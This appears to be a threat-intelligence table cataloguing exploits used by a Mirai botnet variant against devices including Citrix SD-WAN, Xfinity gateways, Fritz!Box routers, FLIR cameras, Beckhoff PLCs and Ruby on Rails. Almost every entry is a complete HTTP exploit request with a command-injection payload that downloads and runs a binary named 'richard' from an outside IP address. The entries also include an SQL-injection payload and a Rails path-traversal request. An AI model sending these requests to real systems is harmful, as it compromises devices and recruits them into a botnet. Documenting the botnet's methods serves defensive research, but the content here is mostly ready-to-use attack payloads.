For more details please contact * [@blackorbrid](https://twitter.com/blackorbird) Thanks for * [pan-unit42](https://github.com/pan-unit42) |*Vulnerability* | *Affected Devices* | *Exploit Format*| |---|---|---| |[CVE-2019-12989, CVE-2019-12991](https://www.exploit-db.com/exploits/47112)|Citrix SD-WAN Appliances (tested on 10.2.2)|```POST /sdwan/nitro/v1/config/get_package_file?action=file_download/cgi-bin/installpatch.cgi?swc-token=%d&installfile=`%s`' % '99999 cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```
```'SSL_CLIENT_VERIFY' : 'SUCCESS'```
```get_package_fil:```
```site_name: 'blah' union select 'tenable','zero','day','research' INTO OUTFILE '/tmp/token_0';#,appliance_type: primary,package_type: active```

```User-Agent: Hello-World```
```Connection: keep-alive```| |[EyeLock nano NXT Remote Code Execution](https://www.exploit-db.com/exploits/40228)| EyeLock NXT Biometric Iris Readers with firmware version 3.5|```GET /scripts/rpc.php?action=updatetime×erver=\|\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```| |[Iris ID IrisAccess ICU Cross-Site Scripting](https://www.exploit-db.com/exploits/40166)|Iris ID IrisAccess ICU 7000-2|```POST /html/SetSmarcardSettings.php HTTP/1.1```
```Content-Length: 11660```
```Content-Type: application/x-www-form-urlencoded```
```Connection: close```
```X-Powered-By: PHP/5.5.13```
```User-Agent: joxypoxy/7.2.6```

```HidChannelID=2&HidcmbBook=0&cmbBook=0\|cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard+%23&HidDisOffSet=13&txtOffSet=37&HidDataFormat=1&HidDataFormatVal=1&DataFormat=1&HidFileAvailable=0&HidEncryAlg=0&EncryAlg=0&HidFileType=0&HidIsFileSelect=0&HidUseAsProxCard=0&HidVerForPHP=1.00.08```| |[CVE-2015-4051](https://www.exploit-db.com/exploits/38514)|Beckhoff CX9020 PLCs|```POST /upnpisapi?uuid:+urn:beckhoff.com:serviceId:cxconfig HTTP/1.1```
```User-Agent: Hello-World```
```Host: 192.168.0.1:5120```
```Content-type: text/xml; charset=utf-8```
```SOAPAction: urn:beckhoff.com:service:cxconfig:1#Write```
```M-SEARCH * HTTP/1.1```
```HOST: 239.255.255.250:1900```
```MAN: ssdp:discover',0Dh,0Ah```
```MX: 3```
```ST: upnp:rootdevice```

```00wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richardAQAAAAAA```| |[Xfinity Gateway Remote Code Execution](https://www.exploit-db.com/exploits/40856)|Xfinity Gateways|```POST /actionHandler/ajax_network_diagnostic_tools.php HTTP/1.1```
```Host: 10.0.0.1:80```
```User-Agent: ```
```Accept: application/json, text/javascript, */*; q=0.01```
```Accept-Language: en-US,en;q=0.5```
```Accept-Encoding: gzip, deflate```
```Content-Type: application/x-www-form-urlencoded; charset=UTF-8```
```X-Requested-With: XMLHttpRequest```
```Referer: http://10.0.0.1/network_diagnostic_tools.php```
```Content-Length: 91```
```Cookie: PHPSESSID=; auth=```
```DNT: 1```
```X-Forwarded-For: 8.8.8.8```
```Connection: keep-alive```

```test_connectivity=true&destination_address=www.comcast.net \|\| cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard; &count1=4```| |[Beward N100 Authenticated Remote Code Execution](https://www.exploit-db.com/exploits/46319)|Beward N100 IP Cameras|```GET /cgi-bin/operator/servetest?cmd=cd /tmp; wget http://185.164.2.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard HTTP/1.1```
```Authorization: Basic YWRtaW46YWRtaW4=```
```Server: Boa/0.94.14rc21```
```Accept-Ranges: bytes```
```Connection: close```
```Content-type: text/plain```| |[Fritz!Box Webcm Command Injection](https://www.exploit-db.com/exploits/32753) - this vulnerability was first briefly seen exploited by the Muhstik botnet in January 2018. This is the first instance of exploitation by a Mirai descendant.|Several versions of Fritz!Box devices|```GET /cgi-bin/webcm HTTP/1.1```

```var:lang&cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard```| |[FLIR Thermal Camera Command Injection](https://www.exploit-db.com/exploits/42788)| Certain FC-Series S and PT-Series models of FLIR Cameras|```POST /page/maintenance/lanSettings/dns HTTP/1.1```
```Host: 192.168.0.1:80```
```Content-Length: 64```
```Accept: */*```
```Origin: http://192.168.0.1```
```X-Requested-With: XMLHttpRequest```
```User-Agent: Testingus/1.0```
```Content-Type: application/x-www-form-urlencoded```
```Referer: http://192.168.0.1/maintenance```
```Accept-Language: en-US,en;q=0.8,mk;q=0.6```
```Cookie: PHPSESSID=d1eabfdb8db4b95f92c12b8402abc03b```
```Connection: close```

```dns%5Bserver1%5D=8.8.8.8&dns%5Bserver2%5D=8.8.4.4%60cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard%60```| |[Sapido RB-1732 Remote Command Execution](https://www.exploit-db.com/exploits/47031)|Sapido RB-1732 Wireless Routers | ```GET /goform/formSysCmd HTTP/1.1```
```('')```

```{'sysCmd': cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard, 'apply': 'Apply', 'submit-url':'/syscmd.asp', 'msg':''}```| |[CVE-2016-0752](https://www.exploit-db.com/exploits/40561)|Ruby on Rails multiple versions|```POST /users/%2f/%2fproc%2fself%2fcomm HTTP/1.1```
```Content-Type: multipart/form-data; boundary=```
```<%=`wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard -O /tmp/richard; chmod +x /tmp/richard; /tmp/richard`%>```| |[CVE-2014-3914](https://www.exploit-db.com/exploits/33807)|Rocket ServerGraph 1.2 (tested on Windows 2008 R2 64 bits, Windows 7 SP1 32 bits and Ubuntu 12.04 64 bits)|```POST /SGPAdmin/fileRequest HTTP/1.1```
```&invoker=&title=¶ms=&id=&cmd=cd /tmp; wget http://185.164.72.155/richard; curl -O http://185.164.72.155/richard; chmod +x richard; ./richard&source=&query=```| |[CVE-2015-2208](https://www.exploit-db.com/exploits/36251)|PHPMoAdmin installations|```POST /moadmin/moadmin.php HTTP/1.1```
```Host: 192.168.0.1:80```
```User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0)Gecko/20100101 Firefox/36.0```
```Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8```
```Accept-Language: en-US,en;q=0.5```
```Accept-Encoding: gzip, deflate```
```DNT: 1```
```Connection: keep-alive```
```Pragma: no-cache```
```Cache-Control: no-cache```
```Content-Type: application/x-www-form-urlencoded```
```Content-Length: 34```

```object=1;system(wget http://185.164.72.155/richard; curl -O http:#//185.164.72.155/richard; chmod +x richard; ./richard);exit```|